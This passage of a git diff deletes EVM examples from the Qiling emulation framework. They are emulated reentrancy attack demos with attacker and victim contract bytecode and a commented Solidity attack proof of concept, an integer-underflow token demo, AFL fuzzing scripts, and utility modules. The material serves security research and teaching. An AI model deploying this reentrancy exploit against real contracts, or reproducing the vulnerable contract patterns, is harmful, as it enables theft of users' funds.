0de0b6b3a7640000837c01000000000000000000000000000000000000000000000000000000009004906040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040160006040518083038185885af19350505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16817c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505050565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f19350505050158015610406573d6000803e3d6000fd5b505600a165627a7a723058205aacb19a5864d2c460aed6c844f2aca575d87de6477ac757a72511bb2975b3f80029' - - ql = Qiling(code=Attack_contract, archtype=QL_ARCH.EVM) - vm:BaseVM = ql.arch.evm.vm - - C1 = b'\xaa' * 20 - C2 = b'\xbb' * 20 - User1 = b'\xcc' * 20 - User2 = b'\xde\xad\xbe\xef' * 5 - - ql.arch.evm.create_account(C1) - ql.arch.evm.create_account(C2) - ql.arch.evm.create_account(User1, 100*10**18) - ql.arch.evm.create_account(User2, 100*10**18) - - EtherStore_contract = '0x6080604052670de0b6b3a764000060005534801561001c57600080fd5b506103b08061002c6000396000f30060806040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631031ec3114610072578063155dd5ee146100c957806327e235e3146100f65780637ddfe78d1461014d578063e2c41dbc14610178575b600080fd5b34801561007e57600080fd5b506100b3600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610182565b6040518082815260200191505060405180910390f35b3480156100d557600080fd5b506100f46004803603810190808035906020019092919050505061019a565b005b34801561010257600080fd5b50610137600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610317565b6040518082815260200191505060405180910390f35b34801561015957600080fd5b5061016261032f565b6040518082815260200191505060405180910390f35b610180610335565b005b60016020528060005260406000206000915090505481565b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101515156101e857600080fd5b60005481111515156101f957600080fd5b62093a80600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401421015151561024c57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185875af192505050151561028357600080fd5b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555042600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60026020528060005260406000206000915090505481565b60005481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505600a165627a7a72305820707bf0ae11ce52ff7b7846ede3497d41b6fadea29579773fc70e8e61c0f549f10029' - - print('Init Victim balance is', vm.state.get_balance(User1)/10**18) - print('Init Attacker balance is', vm.state.get_balance(User2)/10**18) - - code1 = bytecode_to_bytes(EtherStore_contract) - print('\n------ Deploy DeFi contract') - # 1. deploy EtherStore - msg1 = vm.build_message(None, 1, 3000000, CREATE_CONTRACT_ADDRESS, User1, 0, b'', code1, contract_address=C1) - res = vm.execute_message(msg1) - - res_code = bytecode_to_bytes(res.output) - runtime_code, aux_data, constructor_args = runtime_code_detector(res_code) - rt_code = bytecode_to_bytes(runtime_code) - print('Victim balance: ', vm.state.get_balance(User1)/10**18) - - print('\n------ Victim deposit Funds 20ETH to DeFi contract') - # 2. User1 depositFunds 20ETH to bank - call_data = '0xe2c41dbc' - msg2 = vm.build_message(None, 1, 3000000, C1, User1, 20*10**18, bytecode_to_bytes(call_data), rt_code) - res = vm.execute_message(msg2) - # print(res.output) - print('Victim balance: ', vm.state.get_balance(User1)/10**18) - - code2 = bytecode_to_bytes(Attack_contract+ql.arch.evm.abi.convert(['address'], [C1])) - # print(code2.hex()) - print('\n------ Deploy Attack Contract') - - # 3. deploy Attack - # ql.debugger = True - msg3 = vm.build_message(None, 1, 3000000, CREATE_CONTRACT_ADDRESS, User2, 0, b'', code2, contract_address=C2) - res = vm.execute_message(msg3) - # ql.debugger = False - - res_code = bytecode_to_bytes(res.output) - runtime_code, aux_data, constructor_args = runtime_code_detector(res_code) - rt_code1 = bytecode_to_bytes(runtime_code) - - print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack') - # 4. User2 pwnEtherStore with 1ETH - call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')]) - # ql.debugger = True - msg4 = vm.build_message(None, 1, 3000000, C2, User2, 1*10**18, bytecode_to_bytes(call_data), rt_code1) - res = vm.execute_message(msg4) - # ql.debugger = False - print('Attacker balance: ', vm.state.get_balance(User2)/10**18) - - print('\n------ Attacker steal Ether from DeFi contract') - # 5. User2 collectEther - call_data = '0xff11e1db' - msg5 = vm.build_message(None, 1, 3000000, C2, User2, 0, bytecode_to_bytes(call_data), rt_code1) - res = vm.execute_message(msg5) - print('Attacker balance: ', vm.state.get_balance(User2)/10**18) diff --git a/examples/evm/evm_reentrancy_vol.py b/examples/evm/evm_reentrancy_vol.py deleted file mode 100644 index 965922a7c..000000000 --- a/examples/evm/evm_reentrancy_vol.py +++ /dev/null @@ -1,134 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import sys -sys.path.append("../..") - -from qiling import Qiling -from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector -from qiling.arch.evm.vm.vm import BaseVM -from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS -from qiling.const import QL_ARCH - - -def template(vic_contract, deposit, withdraw): - Attack_contract = '0x608060405234801561001057600080fd5b506040516020806104b883398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610435806100836000396000f30060806040526004361061004c576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063a75e462514610179578063ff11e1db146101e1575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610177576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600060149054906101000a90047c0100000000000000000000000000000000000000000000000000000000027c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505b005b6101df60048036038101908080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916906020019092919080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191690602001909291905050506101f8565b005b3480156101ed57600080fd5b506101f66103a9565b005b80600060146101000a81548163ffffffff02191690837c010000000000000000000000000000000000000000000000000000000090040217905550670de0b6b3a7640000341015151561024a57600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16670de0b6b3a7640000837c01000000000000000000000000000000000000000000000000000000009004906040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040160006040518083038185885af19350505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16817c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505050565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f19350505050158015610406573d6000803e3d6000fd5b505600a165627a7a723058205aacb19a5864d2c460aed6c844f2aca575d87de6477ac757a72511bb2975b3f80029' - - ql = Qiling(code=Attack_contract, archtype=QL_ARCH.EVM) - vm:BaseVM = ql.arch.evm.vm - - C1 = b'\xaa' * 20 - C2 = b'\xbb' * 20 - User1 = b'\xcc' * 20 - User2 = b'\xde\xad\xbe\xef' * 5 - - ql.arch.evm.create_account(C1) - ql.arch.evm.create_account(C2) - ql.arch.evm.create_account(User1, 100*10**18) - ql.arch.evm.create_account(User2, 100*10**18) - - EtherStore_contract = vic_contract - - - print('Init Victim balance is', vm.state.get_balance(User1)/10**18) - print('Init Attacker balance is', vm.state.get_balance(User2)/10**18) - - code1 = bytecode_to_bytes(EtherStore_contract) - print('\n------ Deploy DeFi contract') - # 1. deploy EtherStore - msg1 = vm.build_message(None, 1, 3000000, CREATE_CONTRACT_ADDRESS, User1, 0, b'', code1, contract_address=C1) - res = vm.execute_message(msg1) - - res_code = bytecode_to_bytes(res.output) - runtime_code, aux_data, constructor_args = runtime_code_detector(res_code) - rt_code = bytecode_to_bytes(runtime_code) - print('Victim balance: ', vm.state.get_balance(User1)/10**18) - - print('\n------ Victim deposit Funds 20ETH to DeFi contract') - # 2. User1 depositFunds 20ETH to bank - call_data = deposit - msg2 = vm.build_message(None, 1, 3000000, C1, User1, 20*10**18, bytecode_to_bytes(call_data), rt_code) - res = vm.execute_message(msg2) - # print(res.output) - print('Victim balance: ', vm.state.get_balance(User1)/10**18) - - code2 = bytecode_to_bytes(Attack_contract+ql.arch.evm.abi.convert(['address'], [C1])) - # print(code2.hex()) - print('\n------ Deploy Attack Contract') - - # 3. deploy Attack - # ql.debugger = True - msg3 = vm.build_message(None, 1, 3000000, CREATE_CONTRACT_ADDRESS, User2, 0, b'', code2, contract_address=C2) - res = vm.execute_message(msg3) - # ql.debugger = False - - res_code = bytecode_to_bytes(res.output) - runtime_code, aux_data, constructor_args = runtime_code_detector(res_code) - rt_code1 = bytecode_to_bytes(runtime_code) - - print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack') - # 4. User2 pwnEtherStore with 1ETH - call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes(deposit)]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes(withdraw)]) - - msg4 = vm.build_message(None, 1, 3000000, C2, User2, 1*10**18, bytecode_to_bytes(call_data), rt_code1) - res = vm.execute_message(msg4) - # print(res.output) - print('Attacker balance: ', vm.state.get_balance(User2)/10**18) - - print('\n------ Attacker steal Ether from DeFi contract') - # 5. User2 collectEther - call_data = '0xff11e1db' - msg5 = vm.build_message(None, 1, 3000000, C2, User2, 0, bytecode_to_bytes(call_data), rt_code1) - res = vm.execute_message(msg5) - print('Attacker balance: ', vm.state.get_balance(User2)/10**18) - - -if __name__ == '__main__': - contract_1 = '0x6080604052670de0b6b3a764000060005534801561001c57600080fd5b506103b08061002c6000396000f30060806040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631031ec3114610072578063155dd5ee146100c957806327e235e3146100f65780637ddfe78d1461014d578063e2c41dbc14610178575b600080fd5b34801561007e57600080fd5b506100b3600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610182565b6040518082815260200191505060405180910390f35b3480156100d557600080fd5b506100f46004803603810190808035906020019092919050505061019a565b005b34801561010257600080fd5b50610137600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610317565b6040518082815260200191505060405180910390f35b34801561015957600080fd5b5061016261032f565b6040518082815260200191505060405180910390f35b610180610335565b005b60016020528060005260406000206000915090505481565b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101515156101e857600080fd5b60005481111515156101f957600080fd5b62093a80600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401421015151561024c57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185875af192505050151561028357600080fd5b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555042600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60026020528060005260406000206000915090505481565b60005481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505600a165627a7a72305820707bf0ae11ce52ff7b7846ede3497d41b6fadea29579773fc70e8e61c0f549f10029' - c1_deposit = '0xe2c41dbc' - c1_withdraw = '0x155dd5ee' - - contract_2 = '0x608060405234801561001057600080fd5b5033600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506106dc806100616000396000f300608060405260043610610062576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630c08bf881461014d578063590e1ae314610164578063a9059cbb1461017b578063e42c08f2146101c8575b600080339150349050600060648281151561007957fe5b0614151561008657600080fd5b60648181151561009257fe5b046000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055507fc848a0bc6fc10f63d456eae535b952f8768bfd21d409b4933f8032cce0432ea48183604051808381526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019250505060405180910390a15050005b34801561015957600080fd5b5061016261021f565b005b34801561017057600080fd5b50610179610312565b005b34801561018757600080fd5b506101c6600480360381019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610434565b005b3480156101d457600080fd5b50610209600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610658565b6040518082815260200191505060405180910390f35b600034111561022d57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614151561028957600080fd5b7fedf2f7451a6c99c99b58baaddbe18df51bec156fe6ae8dd3ea730168326f94cd3073ffffffffffffffffffffffffffffffffffffffff16316040518082815260200191505060405180910390a1600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16ff5b600080600034111561032357600080fd5b3391506000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600081141561037557600080fd5b61038160648202610670565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055507f658eefd1c566207ffd3fb44f4d9b1e443698a39f8a6f7b134b3fef529e3f3f028183604051808381526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019250505060405180910390a15050565b60008034111561044357600080fd5b339050816000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101561049157600080fd5b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054826000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401101561051c57600080fd5b816000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055507fa25be434081445744d5b297a785f7b7073142ae4bcd91a0e7aa802f802b4e0c7828285604051808481526020018373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001935050505060405180910390a1505050565b60006020528060005260406000206000915090505481565b60003373ffffffffffffffffffffffffffffffffffffffff168260405160006040518083038185875af19250505090508015156106ac57600080fd5b50505600a165627a7a72305820e5031f476480cd5d80ec7b267c7bf4c672137328294cb6b71bbb631ce9b99fc20029' - c2_deposit = '' - c2_withdraw = '0x590e1ae3' - - template(contract_1, c1_deposit, c1_withdraw) - print('\n\n\n**************************\n\n\n') - template(contract_2, c2_deposit, c2_withdraw) - - -### genernal reentrancy poc ### - -# contract Attack { -# address victim; -# bytes4 withdraw_id; -# -# constructor(address addr) { -# victim = addr; -# } -# -# function pwn(bytes4 deposit, bytes4 withdraw) public payable { -# withdraw_id = withdraw; -# // attack to the nearest ether -# require(msg.value >= 1 ether); -# // send eth to the depositFunds() function -# victim.call.value(1 ether)(deposit); -# victim.call(withdraw, 1 ether); -# -# //etherStore.depositFunds.value(1 ether)(); -# // start the magic -# //etherStore.withdrawFunds(1 ether); -# } -# -# function collectEther() public { -# msg.sender.transfer(this.balance); -# } -# -# function () payable { -# if (victim.balance > 1 ether) { -# victim.call(withdraw_id,1 ether); -# } -# } -# } diff --git a/examples/evm/evm_simple_sc.py b/examples/evm/evm_simple_sc.py deleted file mode 100644 index 081e2be20..000000000 --- a/examples/evm/evm_simple_sc.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import sys -sys.path.append("../..") - -from qiling import Qiling -from qiling.const import QL_ARCH - - -def example_run_evm(): - - contract = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029' - ql = Qiling(code=contract, archtype=QL_ARCH.EVM) - - # Add Balance Var to the contract - bal = ql.arch.evm.abi.convert(['uint256'], [20]) - contract = contract + bal - - user1 = ql.arch.evm.create_account(balance=100*10**18) - user2 = ql.arch.evm.create_account(balance=100*10**18) - c1 = ql.arch.evm.create_account() - - def check_balance(sender, destination): - call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender]) - msg2 = ql.arch.evm.create_message(sender, destination, call_data) - return ql.run(code=msg2) - - # Deploy runtime code - msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1) - ql.run(code=msg0) - - # SMART CONTRACT DEPENDENT: check balance of user1, should be 20 - result = check_balance(user1, c1) - print('User1 balance =', int(result.output.hex()[2:], 16)) - - # SMART CONTRACT DEPENDENT: transform 21 from user1 to user2 - call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \ - ql.arch.evm.abi.convert(['uint256'], [21]) - # print('Transfer Calldata Code: ' + call_data) - msg1 = ql.arch.evm.create_message(user1, c1, call_data) - result = ql.run(code=msg1) - if int(result.output.hex()[2:], 16) == 1: - print('User1 transfered 21 Token to User2') - - # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1 - result = check_balance(user1, c1) - final_balance = int(result.output.hex()[2:], 16) - print('User1 final balance =', final_balance) - # print(' also =', hex(final_balance)) - - -if __name__ == "__main__": - example_run_evm() \ No newline at end of file diff --git a/examples/evm/fuzzing/.gitignore b/examples/evm/fuzzing/.gitignore deleted file mode 100644 index d2d0baa16..000000000 --- a/examples/evm/fuzzing/.gitignore +++ /dev/null @@ -1,3 +0,0 @@ -afl_outputs -AFLplusplus -rootfs diff --git a/examples/evm/fuzzing/README.md b/examples/evm/fuzzing/README.md deleted file mode 100644 index 324f9e788..000000000 --- a/examples/evm/fuzzing/README.md +++ /dev/null @@ -1,42 +0,0 @@ -# EVM Fuzz Usage - -python >= 3.8 - -## Installation - -Install Qiling -```bash -git clone https://github.com/qilingframework/qiling_evm.git -cd qiling_evm -python3 -m pip install -e . -``` - -Install AFL -```bash -wget https://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz -or -download from https://lcamtuf.coredump.cx/afl/ - -tar -zxvf afl-latest.tgz -cd afl.2.5.2b -make -sudo make install -``` - -Install AFL python binding -``` -pip install python-afl -``` - -## Run Fuzz -```bash -cd qiling/examples/fuzzing/evm -./fuzz.sh -``` - -# TODO -- qiling/engine/evm/logic/system.py - - create - - create2 -- qiling/engine/evm/logic/call.py - - call \ No newline at end of file diff --git a/examples/evm/fuzzing/fuzz.py b/examples/evm/fuzzing/fuzz.py deleted file mode 100644 index a69781044..000000000 --- a/examples/evm/fuzzing/fuzz.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import afl, os, sys -from underflow_test import underflow - -afl.init() - -sys.stdin.seek(0) -in_str = sys.stdin.read().strip() - -if in_str.isdigit(): - fuzz_value = int(in_str) - underflow(fuzz_value) - -os._exit(0) \ No newline at end of file diff --git a/examples/evm/fuzzing/fuzz.sh b/examples/evm/fuzzing/fuzz.sh deleted file mode 100755 index 93fcdcdc5..000000000 --- a/examples/evm/fuzzing/fuzz.sh +++ /dev/null @@ -1 +0,0 @@ -py-afl-fuzz -n -m 400 -t 1000+ -i ./input -o ./results -- python3 fuzz.py \ No newline at end of file diff --git a/examples/evm/fuzzing/input/input0.txt b/examples/evm/fuzzing/input/input0.txt deleted file mode 100644 index 304dabad2..000000000 --- a/examples/evm/fuzzing/input/input0.txt +++ /dev/null @@ -1,4 +0,0 @@ -2 -11 -22 -330 \ No newline at end of file diff --git a/examples/evm/fuzzing/underflow_test.py b/examples/evm/fuzzing/underflow_test.py deleted file mode 100644 index 6fec1af2c..000000000 --- a/examples/evm/fuzzing/underflow_test.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import sys -sys.path.append("../../../..") - -from qiling import Qiling -from qiling.const import QL_ARCH - - -def underflow(fuzz_balance): - code = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029' - - ql = Qiling(code=code, archtype=QL_ARCH.EVM) - - # Add Balance Var to the contract - bal = ql.arch.evm.abi.convert(['uint256'], [20]) - contract = code + bal - - user1 = ql.arch.evm.create_account() - user2 = ql.arch.evm.create_account() - c1 = ql.arch.evm.create_account() - - def check_balance(sender, destination): - call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender]) - msg2 = ql.arch.evm.create_message(sender, destination, call_data) - return ql.run(code=msg2) - - # Deploy runtime code - msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1) - ql.run(code=msg0) - - # SMART CONTRACT DEPENDENT: check balance of user1, should be 20 - result = check_balance(user1, c1) - - # SMART CONTRACT DEPENDENT: transform 21 from user1 to user2 - call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \ - ql.arch.evm.abi.convert(['uint256'], [fuzz_balance]) - msg1 = ql.arch.evm.create_message(user1, c1, call_data) - result = ql.run(code=msg1) - - # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1 - result = check_balance(user1, c1) - - if int(result.output_data.hex()[2:], 16) > 20: - raise OverflowError() - diff --git a/qiling/arch/evm/AUTHORS.TXT b/qiling/arch/evm/AUTHORS.TXT deleted file mode 100644 index cfeb0b384..000000000 --- a/qiling/arch/evm/AUTHORS.TXT +++ /dev/null @@ -1,2 +0,0 @@ -WU chenxu (kabeor) -LAU kaijern (xwings) \ No newline at end of file diff --git a/qiling/arch/evm/__init__.py b/qiling/arch/evm/__init__.py deleted file mode 100644 index 1dcd2791f..000000000 --- a/qiling/arch/evm/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -import sys - -# Ensure we can reach 1024 frames of recursion -# -EVM_RECURSION_LIMIT = 1024 * 12 -sys.setrecursionlimit(max(EVM_RECURSION_LIMIT, sys.getrecursionlimit())) diff --git a/qiling/arch/evm/_utils/__init__.py b/qiling/arch/evm/_utils/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/_utils/address.py b/qiling/arch/evm/_utils/address.py deleted file mode 100644 index c77c80b21..000000000 --- a/qiling/arch/evm/_utils/address.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import rlp - -from eth_hash.auto import keccak -from eth_typing import Address - -from .._utils.numeric import ( - int_to_bytes32, -) - - -def force_bytes_to_address(value: bytes) -> Address: - trimmed_value = value[-20:] - padded_value = trimmed_value.rjust(20, b'\x00') - return Address(padded_value) - - -def generate_contract_address(address: Address, nonce: int) -> Address: - return force_bytes_to_address(keccak(rlp.encode([address, nonce]))) - - -def generate_safe_contract_address(address: Address, - salt: int, - call_data: bytes) -> Address: - return force_bytes_to_address( - keccak(b'\xff' + address + int_to_bytes32(salt) + keccak(call_data)) - ) diff --git a/qiling/arch/evm/_utils/blake2/__init__.py b/qiling/arch/evm/_utils/blake2/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/_utils/blake2/coders.py b/qiling/arch/evm/_utils/blake2/coders.py deleted file mode 100644 index 6034f6872..000000000 --- a/qiling/arch/evm/_utils/blake2/coders.py +++ /dev/null @@ -1,60 +0,0 @@ -from typing import ( - cast, - Iterable, - Tuple, -) - -from eth_utils import ( - to_int, - to_tuple, - ValidationError, -) - -from .compression import ( - TMessageBlock, -) - -TMessage = Tuple[int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int] -TFCompressArgs = Tuple[int, TMessageBlock, TMessage, Tuple[int, int], bool] - - -def extract_blake2b_parameters(input_bytes: bytes) -> TFCompressArgs: - num_bytes = len(input_bytes) - if num_bytes != 213: - raise ValidationError( - f"input length for Blake2 F precompile should be exactly 213 bytes, got: {num_bytes}" - ) - - rounds = to_int(input_bytes[:4]) - - h_state = cast(TMessageBlock, _get_64_bit_little_endian_words(input_bytes[4:68])) - - message = cast(TMessage, _get_64_bit_little_endian_words(input_bytes[68:196])) - - t_offset_counters = cast(Tuple[int, int], _get_64_bit_little_endian_words(input_bytes[196:212])) - - final_block_int = to_int(input_bytes[212]) - if final_block_int == 0: - final_block_flag = False - elif final_block_int == 1: - final_block_flag = True - else: - raise ValidationError( - f"incorrect final block indicator flag, needed 0 or 1, got: {final_block_int}" - ) - - return rounds, h_state, message, t_offset_counters, final_block_flag - - -@to_tuple -def _get_64_bit_little_endian_words(compact_bytes: bytes) -> Iterable[int]: - remaining_bytes = compact_bytes - if len(remaining_bytes) % 8 != 0: - raise ValidationError( - "Must send bytes in multiples of 8 to get 64-bit words, got length " - f"{len(remaining_bytes)}" - ) - - while len(remaining_bytes): - word, remaining_bytes = remaining_bytes[:8], remaining_bytes[8:] - yield to_int(bytes(reversed(word))) diff --git a/qiling/arch/evm/_utils/blake2/compression.py b/qiling/arch/evm/_utils/blake2/compression.py deleted file mode 100644 index 34c1cba1f..000000000 --- a/qiling/arch/evm/_utils/blake2/compression.py +++ /dev/null @@ -1,180 +0,0 @@ -import struct -from typing import ( - Tuple, -) - -doc = """ - Lovingly lifted from https://github.com/buggywhip/blake2_py - with this license: - - Copyright (c) 2009-2018 Larry Bugbee, Kent, WA, USA - - Permission to use, copy, modify, and/or distribute this software - for any purpose with or without fee is hereby granted, provided - that the above copyright notice and this permission notice appear - in all copies. - - THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR 